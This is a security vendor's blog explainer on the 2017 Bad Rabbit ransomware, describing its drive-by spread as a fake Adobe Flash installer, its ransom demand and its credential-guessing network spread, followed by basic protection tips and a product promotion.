Bad Rabbit Ransomware: A Cybersecurity Threat

Back in 2017, a ransomware outbreak paralyzed several organizations in Russia and Ukraine, with cases also occurring in Turkey, Germany, Bulgaria, and Japan.

Kaspersky Lab's threat intelligence team identified it during a sophisticated attack that hit Russian media outlets, causing servers to crash during the cyberattack. It also hit critical infrastructure organizations in the transportation sector in Ukraine, causing flight delays due to the manual processing of passenger data. A Kiev metro system was also affected, causing payment delays at customer service terminals.

The malware became known as Bad Rabbit ransomware and was the third major spread of malware that year. After the initial outbreak, members of the cybersecurity community were confused about what exactly Bad Rabbit is.

So, what is Bad Rabbit ransomware—and what does Bad Rabbit do?

What is Bad Rabbit ransomware?

Bad Rabbit is similar to other ransomware like WannaCry and Petya/NotPetya in that it spreads through Microsoft Windows vulnerabilities, encrypting files and demanding cryptocurrency, typically Bitcoin, for decryption.

Designed to encrypt and lock files, Bad Rabbit is a type of ransomware that spreads through “drive-by-attacks” where insecure websites are compromised. Disguised as an Adobe Flash Installer, the malware doesn’t travel through traditional types of ransomware attacks like phishing emails but rather through drive-by downloads on compromised websites. This means that a person could be exposed to the virus simply by visiting a malicious or compromised website and downloading files they believe to be Adobe updates.

So, while a person thinks they’re visiting a safe website, a malware dropper is downloaded from the threat actor’s infrastructure onto their computer. Bad Rabbit ransomware is embedded into websites using JavaScript injected into the site’s HTML code. Some members of the cybersecurity community believe the initial outbreak was a targeted attack that may have been months in the making, but that hasn’t been confirmed.

How does an attack work?

Now that you have a better understanding of Bad Rabbit ransomware—what does Bad Rabbit do?

While the downloaded file may look safe, it begins infecting the computer once opened. However, it isn’t installed automatically and must be clicked on to actually lock the computer. When activated, the malicious installer shows a ransom note and payment page demanding a certain Bitcoin amount within a 40-hour deadline. It also displays a note that “no one will be able to recover files without our decryption service.”

Once Bad Rabbit has infected a computer, it attempts to spread across the network by using lists of simple username and password combinations (e.g., 1111, Password, Guest123) to try and force its way into other computers. If successful, Bad Rabbit deploys the ransomware, encrypts files, and moves on to the next device.

Ransomware protection

Companies can reduce the risks posed by ransomware attacks—and ultimately protect themselves from Bad Rabbit ransomware—with a few simple steps.

1. Only download updates from a reliable source; if you need to download Adobe updates, download it from the Adobe website, not a third-party website
2. Perform regular backups
3. Enforce strong password controls
4. Have updated antivirus software
5. Implement network architecture and security controls that segment a corporate network

Bad Rabbit hasn’t affected companies in the U.S. yet, but organizations are strongly encouraged to advise their employees about Bad Rabbit ransomware attacks and remain aware of possible Bad Rabbit outbreaks.

Stay protected with SiteLock

Now that you know what Bad Rabbit ransomware is, discover other ways that hackers hold sites hostage—and what you can do to ensure your site isn’t one of them. Or, check out our comprehensive security solutions against a wide range of cyberthreats, including ransomware.

SiteLock's advanced technology scans your website for vulnerabilities, detects malicious software, and effectively blocks or removes malware. By employing SiteLock's proactive security measures, you can ensure the safety and integrity of your website, keeping your data secure and your operations running smoothly.